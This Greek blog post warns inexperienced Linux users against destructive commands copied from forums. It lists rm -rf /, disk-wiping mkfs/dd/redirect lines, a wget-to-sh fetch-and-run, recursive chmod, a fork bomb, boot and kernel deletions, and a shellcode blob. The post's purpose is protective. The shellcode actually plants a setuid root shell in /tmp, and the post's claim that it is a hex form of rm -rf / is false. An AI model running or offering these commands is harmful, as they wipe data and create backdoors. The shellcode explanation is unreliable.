Οι εντολές που ΠΟΤΕ δεν πρέπει να δώσεις στο σύστημα σου!

Αυτό το θέμα το σκεφτόμουν πολύ καιρό να το κάνω, μα δίσταζα. Τελευταία όμως έτυχαν δυο περιπτώσεις (σε ξένες σελιδες) που είδα πως τελικά χρειαζεται μια σχετική ενημέρωση. Από τη μια υπαρχουν πλέον πολλοί νέοι και άπειροι χρήστες στο Linux και από την άλλη υπαρχουν και διάφορα κακόβουλα άτομα τα οποία κυκλοφορούν εκεί έξω και συνηθως εκμεταλλεύονται την άγνοια των νέων χρηστών.

Δεν είναι και λίγες οι φορές που έχουμε δει να δίνονται καποιες καταστρεπτικές εντολές σε διάφορα σημεία (forums, σχόλια σε blogs, social, mail, κλπ), ακομα και σε Ελληνικά, τις οποίες ο άπειρος χρήστης συνηθως κάνει copy-paste και βρίσκεται μ’ ένα διαλυμένο σύστημα, με απώλεια όλων των δεδομένων του και καποιες φορές με ακομα καταστρεπτικότερες συνέπειες.

Όταν κάποτε στηναμε το osarena, αυτό ακριβώς και ήταν ένα από τα κομμάτια που δώσαμε τεράστιο βάρος. Τα ορθογραφικά και συντακτικά λάθη σε καποια αρθρα ήταν αναπόφευκτα να γίνουν και επιτρεπτά. Τα λάθη όμως σε εντολές και κώδικα σε καμία περίπτωση.

Θυμάμαι μαλιστα μια φορά που την είχαμε πατήσει ελαφρώς, όταν ο ίδιος ο δημιουργός κάποιας εφαρμογής, έκανε ένα μικρο λάθος, όταν την ανέβασε στη σελιδα του και από τότε η επαγρύπνηση μας σε αυτό το κομμάτι είναι η μεγιστη.

-Παρακάτω λοιπόν θα δώσουμε μια σειρά εντολών οι οποίες έχουν απόλυτα καταστροφικές συνέπειες. Μη ξεχνάτε πως το τερματικό/κονσόλα στο Linux, μα και στα υπόλοιπα λειτουργικά συστήματα είναι ένα παντοδύναμο εργαλείο που μπορεί να κάνει τα πάντα. Από το πιο απλό, μέχρι το πιο μεγαλο. Κυριολεκτικά τα πάντα!

-Μπορείτε να το απολαύσετε ωστε να κάνετε γρήγορα και με… μαγικό τρόπο πολλά πράγματα, μα σε καμία περίπτωση δε πρέπει να δώσετε εντολές σαν αυτές που ακολουθούν:

rm -rf /
Διαγράφει όλα τ’ αρχεία στο root directory.

mkfs.ext3 /dev/sda
Κάνει wipeout σε όλα τα αναφερόμενα αρχεία, μετά την εντολη mkfs.

any_command > /dev/sda
Άστα να πάνε, θα χάσετε τα δεδομενα σας.

wget http://some_untrusted_source O | sh
Με αυτό κατεβάζουμε (η εντολη wget) διάφορα από το διαδίκτυο. Να ΜΗΝ το κάνετε αν η σελιδα που παραπέμπει είναι άγνωστη η τέλος πάντων, αν το βρήκατε σε καποια ιστοσελίδα που δεν γνωρίζετε και δεν έχει καποιο κύρος.

dd if=/dev/urandom of=/dev/sda
Με αυτή συμπληρώνετε το κενό χώρο από το partition του δίσκου σας με τυχαία (οτι να’ναι πιο άπλα) δεδομενα.

chmod -R 777 /
Το σύστημα σας θα γίνει εγγράψιμο από παντού.

chmod 000 -R / chown nobody:nobody -R /
Αυτή η εντολη αφαιρεί τη πρόσβαση σε όλους τους χρήστες, εκτός του root.

yes > /dev/sda
Ο δίσκος σας θα γεμίσει με το γραμμα y (και bye-bye όλα τα υπόλοιπα)

mv ~/* /dev/null mv /home/yourhomedirectory/* /dev/null
Με αυτή θα μετακινήσετε όλα τ’ αρχεία σας σ’ έναν ανύπαρκτο χώρο. Κοινώς ξεχάστε τα.

: (){:|:&};:
Το χαιδευτικό αυτής της εντολής είναι: fork bomb και λέει στο σύστημα σας να κάνει τόσες διεργασίες που και το CERN θα χάζευε. Το σύστημα παθαίνει κοκομπλόκο, χάνετε δεδομενα.

char esp[] _attribute_ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Πολύ επικίνδυνη, καθώς είναι δεκαεξαδική παραλλαγή της εντολής rm -rf / που δώσαμε πιο πάνω. Ακομα και έμπειροι χρήστες, μπορεί να τη πατήσουν.

rm -rf /boot/
Διαγράφει τον boot manager (GRUB/LILO). Κοινώς δε μπορειτε να μπείτε σε όποιο η όσα λειτουργικά συστήματα έχετε στο μηχάνημα σας.

rm /boot/vmlinux rm /boot/vmlinuz rm /boot/vmlinux* rm /boot/vmlinuz*
Αυτές διαγράφουν τον πυρήνα (Linux kernel). Κοινώς το σύστημα σας.

rm /bin/init cd / ; find -iname init -exec rm -rf {} \;
Διαγράφει ζωτικά αρχεία και συγκεκριμένα τα έχοντα τη κατάληξη: init, όπου φυσικά ανάμεσα τους και τα /sbin/init.


Αυτές είναι καποιες από τις εντολές που μπορούν να κάνουν ζημιά στο σύστημα σας. Σαφώς και υπαρχουν και άλλες, μα αυτές είναι οι πιο επιζήμιες και αυτές δίνουν οι διάφοροι σε γενικές γραμμές.

Να ξεκαθαρίσουμε πως οι παραπάνω εντολές είναι στην ουσια εργαλεία και υπαρχουν περιπτώσεις που δίνονται για να κάνουν τις συγκεκριμένες που δουλειές που εκτελούν.

Ωστόσο σε αυτή τη περίπτωση οι χρήστες που τις δίνουν ξέρουν τι κάνουν και γιατί το κάνουν. Θεωρώ πως έπρεπε να γίνει το άρθρο αυτό, ωστε να προφυλαχθούν οι πιο νέοι χρήστες, από κακοτοπιές που θα καταστρέψουν το σύστημα τους, καθώς δυστυχώς, πολλά τα κρούσματα τελευταια.

ΠΗΓΗ
Share on Google Plus

About mario1985

Καλώς ορίσατε στο Παπαγάλο Του Διαδικτύου! Ο σκοπός δημιουργίας αυτού του blog είναι η συγκέντρωση αναρτήσεων που βρίσκουμε κατά καιρούς στο διαδίκτυο και μας κινούν το ενδιαφέρον, αλλά δεν αποτελούν απαραίτητα θέση και άποψη του παρόντος ιστολογίου. Ελπίζουμε να βρείτε θέματα που σας ενδιαφέρουν και να μας επισκέπτεστε συχνά!

0 comments:

Δημοσίευση σχολίου